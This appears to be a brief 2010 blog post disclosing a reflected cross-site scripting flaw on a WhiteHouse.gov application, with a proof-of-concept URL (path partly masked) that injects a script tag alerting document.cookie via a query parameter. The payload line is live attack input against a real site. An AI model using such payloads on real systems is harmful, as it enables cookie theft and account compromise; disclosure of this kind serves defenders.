WhiteHouse.gov XSS Vulnerability
Posted by isrtinkode
on April 25, 2010
WhiteHouse.gov XSS Vulnerability
POC:
https://app2.whitehouse.gov/*******?height=200&width=300&urlloc=”><script>alert(document.cookie)</script>
Screen:
Note: You can’t do much with that, but it’s a vulnerability anyway!...